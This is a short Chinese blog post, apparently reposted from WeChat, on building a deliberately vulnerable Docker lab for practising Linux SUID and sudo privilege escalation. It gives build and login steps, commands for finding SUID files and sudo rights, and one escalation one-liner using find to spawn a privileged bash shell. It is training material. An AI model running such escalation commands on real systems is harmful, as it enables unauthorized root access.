1、简介
重新复习docker方面的知识,通过Dockerfile创建一个简单的Linux提权靶场,该靶场支持常见的Linux命令的suid和sudo提权漏洞。提权命令包括如下:
vim
bash
more
less
nano
cp
awk
wget
su
cat
find
# 下载地址
https://github.com/netsecli/linux_privileges.git
2、配置方法
通过Dockerfile打包成新的镜像,并运行镜像即可。如果需要增加其他命令提权,烦请及时提交建议,或者可直接修改dockerfile文件进行添加后重新部署新的镜像。
git clone https://github.com/netsecli/linux_privileges.git
cd linux_privileges/suid_sudo
docker build -t vuln_privige:v1.0 .
docker run -d -p 2222:22 --name=vulns vuln_privige:v1.0
3、连接容器
需要以普通用户模拟登录到容器中,已经创建好普通账号admin,密码为admin
注:仅做安全测试使用,请勿用于生产环境
3.1 通过docker exec直连
docker exec -it vulns /bin/bash
su - admin
# 查看拥有的sudo权限
sudo -l
查找suid文件
find / -perm -u=s -type f 2>/dev/null
3.2通过SSH连接
ssh -p 2222 admin@127.0.0.1
提权参考:
https://gtfobins.github.io
参考示例:
find . -exec /bin/bash -p ; -quit
原文始发于微信公众号(安全孺子牛):Linux提权容器靶场(SUID&SUDO)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论